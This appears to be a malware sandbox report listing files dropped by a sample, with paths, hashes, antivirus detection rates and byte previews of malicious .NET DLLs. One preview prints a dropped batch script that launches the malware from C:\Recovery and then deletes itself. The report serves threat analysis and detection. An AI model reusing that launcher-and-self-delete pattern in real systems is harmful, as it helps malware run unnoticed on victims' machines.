Category:	dropped
Size (bytes):	158
Entropy (8bit):	5.332525623065492
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7/X52PiyBktKcKZG1t+kiE2J5xAI+S7gHn:hCRLuVFOOr+DE70iyKOZG1wkn23ftkH
MD5:	F7BA1BEBE353E3AB242AA937777D87D3
SHA1:	DE1F6A3F481361B3CBA0C8844BE498F964D29512
SHA-256:	6362C7FAA04FB094B3A8E714AC1945028E30B0D2C0F681DAD430A706490B7D1F
SHA-512:	A666CFD68A4B4F8BC2B6B1CDBD3FB62D6BBF03FC1480307162D5F97112B8565793615D38CFFE08FDFB74BAAA829EAFE3779B7B8A9A5EB4B326E503B5EC213644
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\k9Xkw6Am4N.bat"

C:\Users\user\AppData\Local\Temp\lpp3juPLDH

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:WbqgSt:5t
MD5:	D251EB390C5AD6FC27DB78D3D9476580
SHA1:	5A7D3042B86CF880A8684ED255FD1B94780A1FD0
SHA-256:	E131839721177D4C9185CB37F9C355D2B045012CC446AD22D2FC10B8E180895B
SHA-512:	4F1C5ABFC87462E7AB56A266103C44AB50496FFFB38E3DA3C8CBABF12A7B09C63CDF0E6D403CD1B16713AE4A51EEAC0244FCDF421EE6D84D7479E11D67CABBE3
Malicious:	false
Preview:	6Yy2Jubvx8lTDHkmBsFy30OEl

C:\Users\user\AppData\Local\Temp\nXFs1cTXde

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688185
Encrypted:	false
SSDEEP:	3:8v5GT7T8Ez/Yn:82Xnz/Y
MD5:	0AF697B639E399F9E983758DA75EDA19
SHA1:	37006F340B5E3955973BA535C68A9B519E39EEBA
SHA-256:	131AC137E4BFAB708EE04FF64733DB1998DF1A44AB784B21324DA4E1616B462F
SHA-512:	76FF29AA4D199BD1E8329B25035C2DFCF7F4A10BDC0EB9BD2DEDB79A9F5D94EBEE07841DAE0978F26F3FC73AB12B4D4E4F41F201767F5AFDC6A7DF0F5AAE7747
Malicious:	false
Preview:	cdEQfQqgIeyc6z66Yq8LxOa1d

C:\Users\user\AppData\Local\Temp\oALMmntkiW

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:+wRjqMb2:+wpqMS
MD5:	224A1A1176BCA2E2558F78344C86EB4C
SHA1:	91C91A6AF8C19AB98BB5D6DEA1651E4832F7327D
SHA-256:	8D559B4059E1F518BB2DAD5E90E11DEF4DDBA1BFFF2E829791A530CD112D401F
SHA-512:	6396631E4C232092F1758ED86395DF2F1BBD3341944FDCE0A04F3C4E46EC6D2B40ADABC8BF7CB931C0834BBD20031EF77DAB6A4406F8E2E06B2F32CB7426840D
Malicious:	false
Preview:	nxBYHU4CkXOJBnxslepLBi57S

C:\Users\user\Desktop\2558a4816a2b66

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with very long lines (946), with no line terminators
Category:	dropped
Size (bytes):	946
Entropy (8bit):	5.914947652340768
Encrypted:	false
SSDEEP:	24:OgyVxEpKjjW6qTLT4GEfMRGE6BsnchzxQArQ8k/7L0jc:sP2KjKPTLAH7ecFxfe7L0g
MD5:	B4DC0503F1BF3368B04DADBD06A932E0
SHA1:	4FE3B0E71391E8F023A089E87DDE694AC0C9022B
SHA-256:	43B391F9B0414667376991B4FC1485802DFF17556358DAA8F89F0577DC6F1BD1
SHA-512:	5CD985CA53D4FAC2553B6C013C3FDE0A4507FFFF754275CEDFFC2D9F00557337D711D2296792623DA15EF6F223086020C81F14EF2E284858D308401DC5AFF700
Malicious:	false
Preview:	fvLrJ9HrvtuhKpyhmou7zc5YYnCKn8GLiZIrGY9odMleHzbn20oESiHCzwSg76Ewni8ugHaNpFen1aRjLYSwTB2ASG1UFcrgHy1i1qGuabZNEdKZftVioRcmp7cZPFINX8fDisrfShW2mp6y5czWHI10VP23OrfVSMzG8H0wB0QG5k9ABnewQwGPGorTzyQlCBkZ000xlCUR2v5vP21lMsEgGk9Tag6NjpE49kKLxqKNbyWUt5E76pYT6DTP0gXFFGrMqBvosqygh1ERNokec9Q4Ru76R4VQTFHVHKorKZOQ12vE8BCL52mGzx56DzXxVhMbutKCA3UDuACY837P1JVadBfTOrnVBa4TpUTP19KCijVzug7K2I6LMv8tO0yTP9BTGttojrX19T14pqjsudc2etH3VkBBL1wjhBsBxSkKvEM23EDiQGiwgJzWlzT8qVqIgSWo7i4b2SHZhO9RhcvFSADYLWZ79mdZYEWlrYksLG4NBZzWzCbNkkzgO8ckI6cQzrAc2XjI1C3MF0WwgDI7KPzxOzXt5AkOooYUYWebcTVhqnaYmqEEyfFj2NOCAzM1cphbcCXJjqe13RHlZ9GP5fZJiybLIbbmGdFBF86kT4fIAOplFmnBt766PY3nkLBHP1uaLFgaDg6B9RIUJ0Fgya3JhIwrFS9H3Y3JdPZAGN7MA577PiduFeSy7k2CSyUugyHkY904aFalcrImLybgyPBYFEL2WXrR2NpMxWjQsjUAErWPcQ0eXx5RwtfUx7hCXIsOC6yzPLyP5AUXr6aGgN4FSXZE0PcuCRn59HNfbBOM9qWvZHm1gbgKOm6ogu8AsDMoXYYjs5of8sGmBnptmlOlvcrWLj9rCOd5drYAtCIlwBLggUm3FPXGzl34rBYJ67cuOKITPoAkdmytRKz16Flx0WF2ydTro8pyiaSVLSnaOx

C:\Users\user\Desktop\BBFiueAC.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Joe Sandbox View:	Filename: auXl1Tzyme.exe, Detection: malicious, Browse Filename: cGZV10VyWC.exe, Detection: malicious, Browse Filename: oLlotc8NO3.exe, Detection: malicious, Browse Filename: 9D7RwuJrth.exe, Detection: malicious, Browse Filename: qZoQEFZUnv.exe, Detection: malicious, Browse Filename: b2smJKgMG6.exe, Detection: malicious, Browse Filename: 01YP9Lwum8.exe, Detection: malicious, Browse Filename: wYP4G1XOF1.exe, Detection: malicious, Browse Filename: w49A5FG3yg.exe, Detection: malicious, Browse Filename: 9XHFe6y4Dj.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BNVQohxV.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\BUFrAOsF.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BXrbSTCJ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BpwztmWB.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CQWhyrvh.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\CdAHeASz.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ChaYBIVv.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CpJqgrwA.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DHkzZdjU.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DOypUrKc.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DVKqIFYb.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DZeKnCHE.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DzuiDjow.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ENiSZQDC.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EbCAWgmB.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EihSxCbb.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EoSiPjjU.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
